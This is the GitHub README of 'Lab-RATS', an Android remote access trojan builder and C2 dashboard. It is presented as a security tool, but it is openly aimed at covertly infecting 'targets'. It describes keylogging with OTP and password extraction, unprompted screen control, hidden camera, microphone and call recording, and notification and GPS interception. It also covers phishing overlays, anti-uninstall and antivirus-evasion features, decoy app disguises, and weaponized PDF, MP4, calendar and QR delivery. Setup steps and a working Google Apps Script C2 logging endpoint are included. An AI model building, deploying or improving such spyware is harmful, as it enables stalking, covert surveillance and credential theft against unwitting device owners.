Skip to content

Repository files navigation

Screenshot 2026-10-03 at 3 15 42โ€ฏAM


Lab-RATS

Lightweight Android-Built Remote Administration Tool for Security: (L.A.B. - R.A.T.S)

Lab-RATS is an open-source, lightweight Android Remote Administration framework packed with powerful monitoring and interaction capabilities. The system automates the generation of custom, signed .apk files for deployment onto any Android device, providing full device telemetry via a sleek, web-based C2 dashboard. Built to adapt to strict modern mobile environments, it delivers a robust feature suite that operates reliably across both legacy and the newest Android releases.


๐ŸŒŽ Direct IPv6 Access (P2P connection):

Lab-RATS leverages the unique characteristics of publicly routable IPv6 addresses assigned by modern Wi-Fi and cellular (5G/LTE) carriers. By binding the control server directly to a device's Global Unicast Address (GUA), the tool completely bypasses Carrier-Grade NAT (CGNAT) and inbound firewall restrictions. This architecture enables seamless, Zero-Configuration peer-to-peer (P2P) remote access from any modern web browser worldwideโ€”completely eliminating the need for router manipulation, port forwarding, or third-party tunneling services like Ngrok or Pinggy.


๐Ÿ›ก๏ธ Core Features & Security

๐Ÿ” Remote C2 Security & Secure Handshake:

  • The web dashboard is protected by a secure login wall (Default Password: admin1337). The password can be changed directly from the Terminal home page for enhanced security.
  • Implemented a masked credential handshake. Passwords are reversed and Base64 encoded (0x_ prefixed) on the client-side before transmission, rendering them invisible to browser Network/Payload inspectors.

๐Ÿ“ฆ Automated APK Generation, Identity Control & Density Scaling:

  • Instantly build signed.apk for production and testing.
  • Fully customize App Name, Package ID, and Minimum SDK.
  • Resize logos automatically for all Android screen densities.

๐Ÿ“ฑ PC/Mobile Responsive:

  • The remote web interface is fully optimized for both PC and smartphone browsers, featuring a touch-friendly layout, adaptive navigation tabs, and scalable UI elements for monitoring from any device.

๐Ÿ•ต๏ธ Covert Operations & Stealth Management

๐Ÿ’‰ NEW! Payload Delivery Vectors (Installing APK onto Target Device):

  • The Weaponization Engine has been overhauled to support multiple high-success delivery methods (Stealth PDF, Zero-Click MP4, Meeting Invite and Many More), ensuring reliable access across all modern mobile environments.

๐Ÿ›ก๏ธ Evasion Engine:

  • Undetectable by Samsung Knox, McAfee and Google Play Protect.
  • Deep Stealth HTML Shield: The C2 interface utilizes Shadow DOM Cloaking and Base64 Payload Wrapping. Browser "Elements" inspection is zeroed-out, and the tactical structure is ghosted from analysts.
  • Web Hardening: Assets (JS/CSS) are minified and obfuscated; featuring anti-debugging loops and interaction locks (Right-Click, F12) to prevent unauthorized analysis.
  • Dynamic Code Obfuscation: Build-time randomization of logic flow and class names via ProGuard/R8 integration.
  • Encrypted Local Telemetry: Internal system logs are encrypted at build-time, rendering them unreadable to standard mobile forensic tools.

๐ŸŽญ Stealth App Decoys:

Remotely swap the entire Lab-RATS app identity and icon instantly using the "Masquerade Library" of convincing Fully Functional Clones:

  • ๐Ÿ‘€ System Update (Default): Used for initial install it simulates a system update and prompts for permissions during the process, achieving highly successful installs.
  • ๐Ÿงฎ Calculator: Performs actual math with a tactical logic engine.
  • ๐ŸŒฆ๏ธ Weather App: Displays real-time localized forecasts via Open-Meteo API.
  • ๐Ÿ›ก๏ธ Play Protect: Simulates a legitimate security scan to build target trust.
  • ๐Ÿญ Lab-Rats & System Stability Services: Completely unmasked and directly opens the C2 server interface on device.
๐Ÿ“ธ Click to view Stealth App Decoys
Full Web Page Screenshot

โ˜Ž๏ธ Emergency Recovery & Self Healing:

  • Dialer Unlock: Type *#1337# on the phone's keypad to unmask the Lab-RATS server interface back into view.
  • Hidden Backdoor: If the device is in stealth mode, rapidly tap the middle of the decoy screen 10 times to unlock the C2 server interface. (Reverts to stealth mode again once app is closed)
  • Automatically detects and repairs damaged service bindings or revoked permissions in the background.
  • Anti-Removal: On by default in the Ghost Tab, it prevents the user from uninstalling or force-stopping the app via Settings.

๐Ÿ”„ Remote Server Restart:

  • Web UI: One-click "RESTART_SERVER" button on the Terminal tab to refresh background services.
  • SMS Backdoor: Send an SMS/Text containing !RESTART_C2 to the devices number to force the server back online even if it was manually closed or killed by the OS.

๐Ÿ‘ป Task-List Ghosting & Dynamic OTA Camouflage:

  • The app is hard-coded to be invisible in the Android "Recent Apps" list.
  • Generates random version names and codes that mimic legitimate system OTA updates.

๐Ÿš€ Remote Capabilities

๐Ÿ‘ป Ghost_Operations:

  • Ghost Control/Live Feed: Cast & Control the live screen remotely with NO "Consent Prompt" required.
  • Blackout Mode: A high-stealth mode designed to physically mask the targets device display while maintaining a NON-masked live remote feed. (Pair with Ghost Control for maximum stealth)
  • NEW! Ghost_Toast: Remotely deploy tactical, persistent pop-up overlays with fully customizable text (color, size, and screen positioning). Features multiple animation styles (pop, static, and side-scroll) alongside a high-intensity "Burnt_Toast" mode that floods the screen with randomized pop-ups to overwhelm the device.
  • NEW! Remote System Denial Lock: Deploy a persistent, full-screen security overlay to lock physical interaction and render the device inoperable until hard-reset/restarted or unlocked remotely from the C2 dashboard.
  • Live Keylogging: Intercept keystrokes and system text in real-time. Now features Sensitive Info Highlighting (Passcodes, OTPs, Emails glow Red) and Deep Extraction for browser login info.

๐Ÿงช NEW! Exploit_Factory:

  • NFC Proximity Vector: Generate binary NDEF payloads for physical tags.
  • QR Visual Vector: Dedicated high-density QR code generator for independent URL delivery.
  • Smishing Library: Pre-configured tactical phishing templates with automated C2 link injection.
  • Shadow Overlay: Remotely inject functional, pixel-perfect credential-harvesting overlays to the device.

๐Ÿ’€ Anti-Removal Shield (Optimized):

  • High-speed, event-driven protection that blocks attempts to Uninstall or Force Stop the app.
  • Suicide Protocol (Self-Destruct): Remote-triggered persistent loop that wipes all local configuration and initiates a hard uninstallation of the C2 core.

๐Ÿ›ฐ๏ธ Precision GPS Tracking & Intel Stream (Notification Sniffer):

  • One-click uplink to open the devices exact real-time location in Google Maps.
  • Intercept every notification (WhatsApp, Telegram, RCS, System...etc) in a live feed.

๐Ÿ“ธ Tactical Surveillance Hub (Ultra-Stability):

  • Covert Recording: Stealthily record video without any user-facing activity.
  • Snap Photos: Covert image capture integrated into the live stream.
  • Nightmode V2: Aggressive electronic brightening for low-light environments. Now features Hardware Breathe Sync and AE Bypass for zero-freeze operation on modern high-latency sensors.

๐ŸŽ™๏ธ Acoustics & Interception:

  • Timed or Live microphone recording and automated call recording for both incoming and outgoing calls.

๐Ÿ“‚ Advanced Data Uplink:

  • Integrated File Manager: Navigate, download, and manage files. Features an instant Search Bar and Category Filters.
  • Info Gathering: Access Call Logs, Contacts, Hardware Analytics, and Installed Apps remotely.
  • ๐Ÿ“ Direct File Editor: Live-edit text, JSON, and log files directly on the device.

๐Ÿ–ฅ๏ธ Enhanced Remote Shell:

The Terminal Tabs Built-in Shell has been overhauled for professional workflows:

  • Command History: Navigate previous commands instantly using Up/Down arrows.
  • Modernized Interface: Updated to root@Android prompt with an updated help menu.
  • Hardened I/O: Multi-stage retry logic and unique execution tracking for zero-latency command output.

๐Ÿ“Š Telemetry & Reporting:

  • C2 Auto-Reporting: Discrete reporting of Date & Time, Device Make & Model, Connection Type (WiFi/Cellular), IP Address, Port, Active C2 Dashboard Link, Battery %, Stealth Status, Charging Status, and Storage Space to a centralized Google Sheet or Render C2.

๐Ÿง  Native Integration

๐Ÿ› ๏ธ Termux Bridge Integration:

Lab-RATS now features a high-performance bridge to the Termux environment. If Termux is installed on the target device, the remote terminal can instantly elevate its capabilities:

  • Auto-Routing: Common commands like pkg, apt, pip, and python are routed through the bridge.
  • Unrestricted Tools: Install and run Python scripts, Nmap scans, or Metasploit from the C2 web terminal.
  • Persistent Environment: Full support for Termux's internal storage and standard Linux binaries.

Note

Termux Bridge Issues: "Termux allow-external-apps setting is disabled" (Most Common).
Solution: On the Target Device open Termux and run:

echo "allow-external-apps = true" >> ~/.termux/termux.properties
termux-reload-settings

๐Ÿ“ก Command & Control (C2) Options

Lab-RATS supports two primary methods for tracking your device fleet and receiving remote data.

โ˜๐Ÿป Option 1: Google Sheet (Updated)

Best for basic IP tracking and logging. No server maintenance required.

  1. Create a new Google Sheet.
  2. Go to Extensions โ†’ Apps Script and Paste in the Hybrid Snippet below:
function doGet(e) { return handleRequest(e); }
function doPost(e) { return handleRequest(e); }

function handleRequest(e) {
  try {
    var ss = SpreadsheetApp.getActiveSpreadsheet();
    var sheet = ss.getSheetByName("LabRATS Logs") || ss.insertSheet("LabRATS Logs");
    
    // Auto-initialize headers if new sheet
    if (sheet.getLastRow() == 0) {
      sheet.appendRow([
        "Timestamp", 
        "Model #", 
        "Connection Type", 
        "IP Address", 
        "Port", 
        "Active C2 Link", 
        "Battery", 
        "Stealth Status", 
        "Power", 
        "Free Storage"
      ]);
    }
    
    var data = (e.postData && e.postData.contents) ? JSON.parse(e.postData.contents) : e.parameter;
    
    var row = [
      new Date(),
      data.device || data.model || "Unknown",
      data.network || "Unknown",
      data.ip || "Unknown",
      data.port || "9191",
      data.link || "Handshake_Pending",
      data.battery || "0%",
      (data.stealth === true || data.stealth === "true") ? "ACTIVE" : "OFF",
      data.charging || "Discharging",
      data.storage || "Unknown"
    ];
    
    sheet.appendRow(row);
    return ContentService.createTextOutput("SUCCESS").setMimeType(ContentService.MimeType.TEXT);
  } catch (err) {
    return ContentService.createTextOutput("ERROR: " + err.message).setMimeType(ContentService.MimeType.TEXT);
  }
}
  1. Click Deploy โ†’ New Deployment โ†’ Web App โ†’ Execute as Me (E-Mail) โ†’ Who has Access: Anyone.

Important

4. Copy the Webhook URL provided and prepare to paste it into the APK-builder tool when prompted. (Get Started Section Below)


โœŒ๐Ÿป Option 2: Tactical Node.js Backend (Advanced)

Best for professional fleet management and Automatic File Exfiltration.

  1. Host the Backend: Use the source code in the /c2-server directory. You can host this on platforms like Render, Railway, or your own VPS.
  2. Get your URL: Once your service is live, copy the URL (e.g., https://labrats-c2.onrender.com).
  3. Hard-code the Link: Enter the Render URL into the APK Builder when prompted for the WEBHOOK_URL.

Advantages of Option 2:

  • ๐ŸŒ Dual-Stack IP Binding: Full support for both IPv4 and IPv6 connections, enabling seamless C2 telemetry and reverse WebSocket tunneling across cellular carrier NAT64 and dual-stack Wi-Fi networks.
  • ๐Ÿ“‚ Exfiltration Vault: Audio/Video recordings are automatically uploaded and stored on your server.
  • ๐Ÿ“ก Live Fleet List: A professional glass-morphism dashboard to manage all "Rats" in one place.
  • ๐Ÿ”„ Dynamic Sync: Heartbeat reporting ensures your P2P links are always up-to-date.

๐Ÿ› ๏ธ Get Started

1. Requirements

  • Java 17 or 21 installed on your workstation.
  • A Test Android device. ๐Ÿ“ฑ (Samsung/Pixel/OnePlus/HTC supported)
  • Your Google Sheet Webhook URL or Render URL. (previous sections above)

2. Building the APK (on PC)

  1. Download the Repo: git clone https://github.com/K4N3CO/Lab-RATS.git
  2. Navigate to: cd /Lab-RATS/apk-builder/
  3. Execute the Builder:
    • Mac/Linux: chmod +x build.sh && ./build.sh
    • Windows: build.bat
  4. Select a Build Strategy:
    • Option 1 (Manual): For basic configuration of App Name, ID, and Logo before building.
    • Option 6 (Infection Chain Wizard): For the Full Build โ†’ Host โ†’ Weaponize flow.
  5. Enter your Google Sheet Webhook URL or Render URL when prompted to enable remote device IP reporting.
  6. Retrieve your signed.apk (and any weaponized payloads like PDFs or MP4s) from the Lab-RATS/apk-builder/output/ directory.

3. Deploying & Installing onto Android Devices

Deployment is a multi-stage process involving Weaponization, Hosting, and Execution.

A. NEW! Strategic Weaponization (The Wrapper)

Standard .apk files are often blocked by email filters and browser security. Use the Infection Chain Wizard (Option 6) in the apk-buildertool to wrap your link inside a high-compatibility carrier file:

  • ๐Ÿ“‘ Stealth PDF (Highly Recommended): Send to targets via Email or Drive. It utilizes URI Actions instead of JavaScript to trigger an automatic browser-based download, bypassing standard PDF security filters.
  • ๐ŸŽฌ Zero-Click MP4: Send as a video file. It exploits mobile Media Heap Overflows during gallery indexing or thumbnail generation to force-register the C2 link in the background.
  • ๐Ÿ—“๏ธ Meeting Invite (ICS): Injects a persistent event into the target's Calendar with automated reminders and a weaponized "Security Review" link.
  • ๐Ÿ”ณ QR Code / ๐Ÿ“ก NFC: Best for physical placement or "Tap-to-Infect" proximity delivery. Generates a high-density QR or NDEF record pointing to the hardened delivery URL.
  • and Many More: The Wizard also supports ADB Strategic Bridge, Stego Image Tails, PWA Manifests, and Office Document macros.

B. Hosting Strategies

  • Anonymous Cloud: Option 6 uses Catbox.moe by default. It is anonymous, fast, and generates a direct link.
  • P2P Direct: Host the APK directly from your PC using a public tunnel, or from another infected device using the /download/ endpoint.

C. Installation & Initialization

Once the Target device downloads the APK:

  1. Manual Sideload: If you have physical access to the device, use adb install signed.apk
  2. Permissions (CRITICAL): Open the app ONCE. It will prompt for necessary permissions (Camera, SMS, Files, etc).
    • Remote Permission Prompt: If the user skips some permissions, you can remotely trigger the system prompt again from the Ghost Tab using the REPAIR PERMISSIONS button.
  3. Self-Vanishing: A few seconds after launch, the app will automatically replace its icon and name with the decoy you chose during build ("System Update", "Calculator"...etc).
  4. Uplink Confirmation: Check your Google Sheet. Within 5 seconds of initialization, the Device Make & Model, Connection Type, IP Address, Port, Active C2 Dashboard Link, Battery %, Stealth Status, Charging Status and Storage Space will appear in the log.
๐Ÿ“ธ Click to view Example Google Sheet Reporting
Full Web Page Screenshot

โญ Support the Development

If you find Lab-RATS awesome and useful for your security research, please Star โญ the projectโ€”it drives further development!!

Contributions:

Bug Reports, Add New Feature and Pull Requests are always welcome!. (See CONTRIBUTING.md for more info.)

Donations:

https://buymeacoffee.com/k4n3co

bc1q8d66m0qthnh6nw9hc5wl09m7pfydk46q5w8rxx

๐Ÿ“ธ Screenshots & Video Clips

APK-Builder Example (Mac OS):

APK-Builder_Example.mov

Built APK (C2 Server) Installed on Android Device:

Screenshot 2026-10-03 at 3 29 37โ€ฏAM

Lab-RATS Initial Install Sequence & Icon Stealth Preview:

Initial_Install_Example.mov

Remote Web-Based C2 Dashboard - PC Interface

Remote C2 Dashboard Clip #1:

Screen.Recording.2026-10-03.at.3.54.01.AM.mov

Remote C2 Dashboard Clip #2:

Screen.Recording.2026-09-19.at.12.09.42.AM.mov

01. Terminal Tab:

๐Ÿ“ธ Click to view web page screenshot
Full Web Page Screenshot

02. Ghost_Operations Tab:

๐Ÿ“ธ Click to view web page screenshot
Full Web Page Screenshot

03. Optics/Live Camera Tab:

๐Ÿ“ธ Click to view web page screenshot
Full Web Page Screenshot

04. Locate/Live GPS Tab:

๐Ÿ“ธ Click to view web page screenshot
Full Web Page Screenshot

05. Exploit_Factory Tab:

๐Ÿ“ธ Click to view web page screenshot
Full Web Page Screenshot

06. Device Data/Storage Tab:

๐Ÿ“ธ Click to view web page screenshot
Full Web Page Screenshot

07. Intel/App Notifications Tab:

๐Ÿ“ธ Click to view web page screenshot
Full Web Page Screenshot

08. SMS/Text Message Tab:

๐Ÿ“ธ Click to view web page screenshot
Full Web Page Screenshot

09. MMS/Multimedia Message Tab:

๐Ÿ“ธ Click to view web page screenshot
Full Web Page Screenshot

10. Acoustics/Audio Tab:

๐Ÿ“ธ Click to view web page screenshot
Full Web Page Screenshot

11. Comms/Call_Logs Tab:

๐Ÿ“ธ Click to view web page screenshot
Full Web Page Screenshot

12. Contacts Tab:

๐Ÿ“ธ Click to view web page screenshot
Full Web Page Screenshot

13. Hardware/Device Info Tab:

๐Ÿ“ธ Click to view web page screenshot
Full Web Page Screenshot

โš ๏ธ Disclaimer

This tool is for educational and authorized security testing purposes ONLY!. The developers & contributors assume NO responsibility for ANY misuse, damage to devices or relationships caused by this software. Please use it responsibly. Thank you!


๐Ÿ“„ License

This project is Licensed to K4N3CO under the MIT License.


About

Lab-RATS is a powerful and lightweight Android Remote Administration Tool full of features that enables remote monitoring, management and interaction through a sleek web interface and supports the newest modern Android releases.

Topics

Resources

Code of conduct

Contributing

Security policy

Stars

60 stars

Watchers

4 watching

Forks

Releases

Packages

Contributors

Languages